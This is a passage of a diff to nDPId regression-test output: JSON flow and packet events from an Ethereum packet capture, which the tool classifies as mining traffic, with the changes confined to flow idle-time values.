-00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1776,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":3,"flow_last_seen":1578508365926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365926,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG2dbAqAG4z7TO2N1pdl+dzwtnJw8AtoAQECw5oAAAAQEICiLYmUxcfI6d"} -00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1777,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365885,"flow_last_seen":1578508365927,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":125,"midstream":0,"thread_ts_msec":1578508365927,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"207.180.206.216","src_port":56681,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1775,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":2,"flow_last_seen":1578508365925,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365925,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMG5s7PtM7YwKgBuHZf3WknDwC1nc8LZ6AScSCqDAAAAgQFrAQCCApcfI6dItiZJwEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1776,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":3,"flow_last_seen":1578508365926,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365926,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG2dbAqAG4z7TO2N1pdl+dzwtnJw8AtoAQECw5oAAAAQEICiLYmUxcfI6d"} +00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1777,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365885,"flow_last_seen":1578508365927,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":125,"midstream":0,"thread_ts_msec":1578508365927,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"207.180.206.216","src_port":56681,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1780,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1578508365951,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":189,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":189,"pkt_l4_len":155,"thread_ts_msec":1578508365951,"pkt":"KDc3AG3IEBMx8Tl2CABFAACvrTpAADMRthqnVnoywKgBuHZfdl8AmyGXAff4avCCJKd8iLkYnGp5WBGcR5kwKjaGYfuGK7O5Pxha3PZrVargsE3sp+V969kCE0ZShXRyP212X0\/ogX+KLxU0BMrg9yur0MCSn4OC+hF8e78p1SovnEhcJv1j5UvsAALwyYSnVnoygnZfgKByZEv+wn4eYEUXuf5R8Qoku8N0GB0rNIQImrGkxu4BYoReFiBh"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1835,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508366005,"flow_last_seen":1578508366005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366005,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.83.237.44","src_port":56684,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1835,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1578508366005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508366005,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGV9jAqAG4M1PtLN1sdl8dp4x2AAAAALAC\/\/+ZwwAAAgQFtAEDAwUBAQgKItiZlwAAAAAEAgAA"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1857,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508366020,"flow_last_seen":1578508366020,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366020,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"88.99.93.219","src_port":56685,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1857,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1578508366020,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508366020,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGwhnAqAG4WGNd291tdl+CSdQcAAAAALAC\/\/9XrgAAAgQFtAEDAwUBAQgKItiZpAAAAAAEAgAA"} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1862,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1578508366029,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508366029,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGjuvAqAG4I+nFg909dl+ptEcpAAAAALAC\/\/+KMAAAAgQFtAEDAwUBAQgKItiZrAAAAAAEAgAA"} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1883,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":1578508366047,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508366047,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC4GadwzU+0swKgBuHZf3WzP3gWFHaeMd6AScSA1dQAAAgQFrAQCCAppVMVvItiZlwEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1884,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":3,"flow_last_seen":1578508366048,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508366048,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGV+TAqAG4M1PtLN1sdl8dp4x3z94FhoAQECzFBwAAAQEICiLYmb1pVMVv"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1885,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508366005,"flow_last_seen":1578508366049,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":561,"flow_tot_l4_payload_len":561,"flow_avg_l4_payload_len":140,"midstream":0,"thread_ts_msec":1578508366049,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.83.237.44","src_port":56684,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1886,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":2,"flow_last_seen":1578508366053,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508366053,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQG6OaKOxE6wKgBuHZf3Wh1cVfy7bR73KAScSDVxwAAAgQFrAQCCArYuYPhItiZCQEDAwc="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1887,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":3,"flow_last_seen":1578508366053,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508366053,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG3O7AqAG4ijsROt1odl\/ttHvcdXFX84AQECxkxwAAAQEICiLYmcLYuYPh"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1888,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365852,"flow_last_seen":1578508366055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":447,"flow_tot_l4_payload_len":447,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1578508366055,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.59.17.58","src_port":56680,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1889,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1578508366058,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508366058,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEG0R1YY13bwKgBuHZf3W1kMpWvgknUHaAScSBLTAAAAgQFrAQCCApXTVsMItiZpAEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1890,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1578508366058,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508366058,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGwiXAqAG4WGNd291tdl+CSdQdZDKVsIAQECza4gAAAQEICiLYmcZXTVsM"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1891,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508366020,"flow_last_seen":1578508366059,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":580,"flow_tot_l4_payload_len":580,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1578508366059,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"88.99.93.219","src_port":56685,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1930,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508366073,"flow_last_seen":1578508366073,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366073,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"206.189.107.35","src_port":56686,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1930,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1578508366073,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508366073,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGPnfAqAG4zr1rI91udl8AOSk+AAAAALAC\/\/8AywAAAgQFtAEDAwUBAQgKItiZ0wAAAAAEAgAA"} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1939,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1578508366081,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508366081,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8jPoAACgGJqAN+w7HwKgBuHZf3WZ3LeB+TwsEYqASaN+zCgAAAgQFrAQCCAoTnX6eItiY9AEDAws="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1941,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1578508366081,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508366081,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGW6LAqAG4DfsOx91mdl9PCwRidy3gf4AQECw5oQAAAQEICiLYmdkTnX6e"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1951,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365828,"flow_last_seen":1578508366083,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1578508366083,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.251.14.199","src_port":56678,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1968,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1578508366117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508366117,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGSnvOvWsjwKgBuHZf3W6FBUsAADkpP6AScSCofQAAAgQFrAQCCApn2sBGItiZ0wEDAwc="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1969,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1578508366117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508366117,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGPoPAqAG4zr1rI91udl8AOSk\/hQVLAYAQECw4DwAAAQEICiLYmfpn2sBG"} -00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1970,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508366073,"flow_last_seen":1578508366119,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":407,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1578508366119,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"206.189.107.35","src_port":56686,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1578508365226,"flow_last_seen":1578508366012,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":539,"flow_tot_l4_payload_len":1302,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.75.171.190","src_port":56657,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00802{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508365852,"flow_last_seen":1578508366055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":447,"flow_tot_l4_payload_len":447,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.59.17.58","src_port":56680,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":61,"flow_first_seen":1578508365045,"flow_last_seen":1578508365241,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":410,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"185.219.133.62","src_port":56645,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1578508365153,"flow_last_seen":1578508365387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":462,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.250.140","src_port":56650,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1835,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508366005,"flow_last_seen":1578508366005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366005,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.83.237.44","src_port":56684,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1835,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1578508366005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508366005,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGV9jAqAG4M1PtLN1sdl8dp4x2AAAAALAC\/\/+ZwwAAAgQFtAEDAwUBAQgKItiZlwAAAAAEAgAA"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1857,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508366020,"flow_last_seen":1578508366020,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366020,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"88.99.93.219","src_port":56685,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1857,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1578508366020,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508366020,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGwhnAqAG4WGNd291tdl+CSdQcAAAAALAC\/\/9XrgAAAgQFtAEDAwUBAQgKItiZpAAAAAAEAgAA"} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1862,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1578508366029,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508366029,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGjuvAqAG4I+nFg909dl+ptEcpAAAAALAC\/\/+KMAAAAgQFtAEDAwUBAQgKItiZrAAAAAAEAgAA"} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1883,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":1578508366047,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508366047,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC4GadwzU+0swKgBuHZf3WzP3gWFHaeMd6AScSA1dQAAAgQFrAQCCAppVMVvItiZlwEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1884,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":3,"flow_last_seen":1578508366048,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508366048,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGV+TAqAG4M1PtLN1sdl8dp4x3z94FhoAQECzFBwAAAQEICiLYmb1pVMVv"} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1885,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508366005,"flow_last_seen":1578508366049,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":561,"flow_tot_l4_payload_len":561,"flow_avg_l4_payload_len":140,"midstream":0,"thread_ts_msec":1578508366049,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.83.237.44","src_port":56684,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1886,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":2,"flow_last_seen":1578508366053,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508366053,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQG6OaKOxE6wKgBuHZf3Wh1cVfy7bR73KAScSDVxwAAAgQFrAQCCArYuYPhItiZCQEDAwc="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1887,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":3,"flow_last_seen":1578508366053,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508366053,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG3O7AqAG4ijsROt1odl\/ttHvcdXFX84AQECxkxwAAAQEICiLYmcLYuYPh"} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1888,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365852,"flow_last_seen":1578508366055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":447,"flow_tot_l4_payload_len":447,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1578508366055,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.59.17.58","src_port":56680,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 